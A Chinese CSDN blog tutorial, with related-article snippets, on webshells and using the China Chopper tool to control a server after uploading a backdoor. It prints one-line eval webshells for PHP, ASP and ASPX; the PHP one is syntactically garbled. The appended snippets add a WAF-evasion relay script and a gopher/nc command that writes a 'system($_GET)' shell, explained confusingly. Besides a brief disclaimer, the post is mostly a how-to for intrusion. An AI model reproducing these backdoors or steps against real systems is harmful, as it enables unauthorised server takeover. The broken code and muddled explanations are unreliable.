初始webshell+中国菜刀的使用

最新推荐文章于 2024-05-29 13:34:37 发布
最新推荐文章于 2024-05-29 13:34:37 发布
阅读量5.2k 收藏 14
点赞数 4
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_48222671/article/details/124257922
版权

提示:文章内容仅用于渗透测试研究学习,请勿用于非法测试

文章目录

一、webshell是什么?

“Web” 的含义是服务器开放web服务;
"Shell"的含义是取得对服务器某种程度上的操作权限;
"webshell"就是获取对服务器的控制权限,这就需要我们借助一些webshell管理工具和一些漏洞去得到这种权限。

二、木马

在我们使用webshell管理工具之前,需要先在目标服务器上传或创建一个木马文件

木马分为大马、小马和一句话木马:

  1. 小马:文件体积小、上传文件、文件修改、文件管理
  2. 大马:文件体积较大、功能齐全、能够提权、操作数据库等(不推荐)
  3. 一句话木马:短小精悍、功能强大、隐蔽性好、客户端直接管理(主流)

php

<?php @eval($_POST['x'];?)>

asp

<%eval request ("x")%>

aspx

<%@ Page Language="Jscript"%> <%eval(Request.Item["x"],"unsafe");%>

三、中国菜刀

这里以php为例
首先我们先将php一句话木马上传到目标服务器中,用菜刀去尝试连接

在地址中填写上传一句话木马的地址,在后面的方框中填写所要连接的参数(也就是代码中的’x’)

在这里插入图片描述
在这里插入图片描述

添加完成之后就可以对目标服务器进行控制,可以对文件进行相关的操作,也可以对数据库进行操作,也可以创建一个用户。

在这里插入图片描述

doudou159753
关注
  • 4
    点赞
  • 14
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
WebShell连接工具(中国菜刀WeBaCoo、Weevely)使用
悦分享
07-31 3316
第三步此时会弹出一个添加shell的对话框,由图一看出我的“dxr.php”上传在站点根目录,所以这里的地址填为http//localhost/dxr.php。最后把这个文件保存,上传到你站点里面,可以是根目录,也可以是其他,都行的。这些网页脚本常称为WEB脚本木马,比较流行的asp或php木马,也有基于.NET的脚本木马与JSP脚本木马。最后点击“添加”按钮,成功后就会产生一条新的记录,鼠标右键点击就可以进行操作了,如下图,可以进行文件管理,数据库管理,虚拟终端。哈哈...大功告成!...
网安工具系列:WebShell --中国菜刀,管站之刀
weixin_54626591的博客
03-29 490
WebShell --中国菜刀,管站之刀
webshell管理工具-菜刀的管理操作
黄乔国PHP
03-09 1776
Webshell工具是一种用于测试和评估Web服务器安全性的软件工具。这些工具可以利用Web应用程序中的漏洞或者弱密码等安全问题,将Webshell植入到目标服务器上,从而获取对服务器的控制权。支持多种Web应用程序漏洞利用:例如SQL注入、文件包含、文件上传、命令注入等。支持多种Webshell类型:例如PHP、ASP、JSP等。提供一系列操作功能:例如上传文件、下载文件、执行命令、创建用户、修改系统配置等。
常见webshell工具及特征分析
最新发布
白帽黑客八哥的博客
05-29 1451
在工作中经常会遇到各种websehll,黑客通常要通过各种方式获取 webshell,从而获得企业网站的控制权,识别出webshell文件或通信流量可以有效地阻止黑客进一步的攻击行为,下面以常见的四款webshell进行分析,对工具连接流量有个基本认识。Webshell简介webshell就是以aspphp、jsp或者cgi等网页文件形式存在的一种代码执行环境,主要用于网站管理、服务器管理、权限管理等操作。
webshell管理工具之一】中国菜刀
redwand的博客
05-08 5590
写一个webshell的管理工具使用系列,以便于更好的理解和实战运用,先从大名鼎鼎的中国菜刀开始吧。
菜刀webshell特征分析
博客地址 www.sec0nd.top
08-01 1481
Webshell是hacker经常使用的一种恶意脚本,其目的是获得对服务器的执行操作权限,比如执行系统命令、窃取用户数据、删除web页面、修改主页等,其危害不言而喻。hacker通常利用常见的漏洞,如SQL注入、远程文件包含(RFI)、FTP,甚至使用跨站点脚本攻击(XSS)等方式作为社会工程攻击的一部分,最终达到控制网站服务器的目的。有个想法,看看他这个工具的原理,再分析一下菜刀的特征。我用的最多的就是菜刀,蚁剑安装不上,后面有机会再分析。......
LadonGo实现菜刀连接webshell一句话执行cmd代码
K8哥哥
02-03 1346
背景 最近VPS被人D比较卡,有时候M都不定连得上,或者连上了也难代理出来,所以需要一个命令行下连接内网WEBSHELL执行命令的工具,当然这个功能Ladon早有了。主要是因为在Linux下横向渗透连接内网其它机器执行命令,GO版还没有,所以先给LadonGo添加PHP一句话的连接功能,其它webshell有空再加。 PS:其实主要是另一个原因,好像M在某个LNX环境下有问题,兼容性非常差有个BUG,NC或代理工具等可连网程序通过M执行后经常容易僵尸进程,出此意外得重启M或重启系统才行,而出现僵尸进程时又还
中国蚁剑 webshell工具
08-12
中国蚁剑
使用机器学习识别WebShell
03-06
## 使用机器学习识别WebShell 学习样本在**shell** 目录,目前样本较少,疏漏之处在所难免,测试结果如下: ![pic/test.png](pic/test.png) ## 实现原理 实现原理是使用朴素贝叶斯进行文本分类.分类的样本包含...
菜刀webshell流量数据包
08-01
菜刀webshell流量数据包
强大的webshell管理工具——蚁剑
12-26
中国蚁剑,免费拿走,自己踩过的坑,不想别人再踩
渗透系列:Webshell的介绍及工具的使用
01-14
渗透系列:Webshell的介绍及工具的使用
菜刀过狗连接webshell的技巧
https://www.cnblogs.com/zpchcbd/
03-28 2187
自己在搭建的服务器上创建一个有以下代码的php文件 然后用菜刀来连接这个php文件 通过其中的代码的加密方式传输数据 达到过安全狗的目的···· $target="http://192.168.1.131:81/1.php";//$target里面的url 就是你的webshell的地址 $poststr=''; $i=0; foreach($_POST as $k=>$v) { if(s...
web安全第四天:webshell原理与菜刀使用
cc777777777的博客
02-26 1764
webshell原理与菜刀使用
自学渗透第四天--中国菜刀
weixin_43710367的博客
05-12 1245
自学渗透第四天–中国菜刀 一、如何使用 中国菜刀使用可利用网站的文件上传漏洞,通过一句话木马“<?php @eval($_POST['caidao']);?>”获取网站shell。本笔记使用的靶机是owasp。 (1)首先将一句话木马上传至网站后台。 (2)运行该文件,确认文件上传成功。 (3)复制该链接到中国菜刀,并输入相应的密码。 (4)成功获取网站shell。 二、常用功能 1、上传本地文件到网站后台。 2、下载在线文件至网站后台。 将欲下载的文件链接添加至下载框即可 由于某
菜刀、蚁剑以及冰蝎三款Webshell管理工具简介
永远是少年
05-07 5331
今天继续给大家介绍渗透测试相关知识,本文主要内容是菜刀、蚁剑以及冰蝎三款Webshell管理工具简介。 一、三款webshell管理工具简单对比 二、菜刀数据包解析 三、蚁剑数据包解析 四、冰蝎数据包解析
渗透测试-菜刀冰蝎蚁剑哥斯拉等webshell工具及特征分析
qq_53058639的博客
03-17 1104
在测试过程中,我们经常会运到各种webshell管理工具,这里我介绍几种常见的webshell工具给大家。webshell就是以asp、php、jsp或者cgi等网页文件形式存在的一种代码执行环境,主要用于网站管理、服务器管理、权限管理等操作。使用方法简单,只需上传一个代码文件,通过网址访问,便可进行很多日常操作,极大地方便了使用者对网站和服务器的管理。?
php菜刀一句话webshell,整理的最新WebSHell (php过狗一句话,过狗菜刀,2016过狗一句话,2016php免杀一句话)...
weixin_36080842的博客
03-25 344
中国菜刀下载,基于原版中国菜刀优化版20160309.下载地址:China chopper特别推荐的一个php一句话.菜刀可以连接,过waf,过安全狗,D盾,360,php一句话木马带404页面,带MD5加密,可浏览器POST任意php代码执行.代码如下:echo"404NotFound!";error_reporting(0);if(isset($_POST['com'])&&...
中国菜刀之检查是否含有shell
weixin_34274029的博客
06-14 178
http协议的后门:   使用工具:WSExplorer(抓包工具),编解码器Encoder(对数据包进行解码)   过程:用抓包工具抓菜刀的进程,抓取含有菜刀密码的那个包(post),对其第一次解码:URI解码(decode),第二次解码:将“z0=”后面的数据进行base64解码,第三次进行解码:@eval(base64_decode后面括号的内容进行base64解码,如果是带有后门的菜刀...
使用gopher协议写webshell
06-06
Gopher 协议是一个老式的网络协议,它主要用于文本传输和文件下载。由于一些历史原因,Gopher 协议在一些场景下仍然有用处,例如绕过一些防火墙和安全设备。在某些情况下,可以利用 Gopher 协议来写 Webshell,从而实现远程命令执行和文件上传等功能。 下面是一个简单的 Gopher Webshell 例子: 1. 创建一个 PHP 脚本,将其编码为 base64 格式,假设文件名为 `shell.php`。 2. 将编码后的 PHP 脚本内容插入到 Gopher URL 中,形如 `gopher://hostname:port/_<base64-encoded-php-script>`。 3. 在浏览器或者 curl 等工具中访问该 Gopher URL,即可触发 PHP 脚本执行,从而实现远程命令执行和文件上传等功能。 例如,可以使用以下命令在 Linux 系统上写入一个 Gopher Webshell: ``` echo '<?php system($_GET["cmd"]) ?>' | base64 | xargs printf "GET /_%s HTTP/1.0\r\n\r\n" | nc hostname port ``` 其中,`hostname` 和 `port` 分别为目标主机和端口号,`cmd` 为远程命令执行参数。此时,访问 `gopher://hostname:port` 即可执行远程命令。 需要注意的是,使用 Gopher 协议写 Webshell 存在一些风险,容易被防火墙和安全设备识别和拦截。此外,由于 Gopher 协议已经过时,一些浏览器和工具可能不支持 Gopher URL。因此,在实际应用中,需要根据具体情况进行选择和调整。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值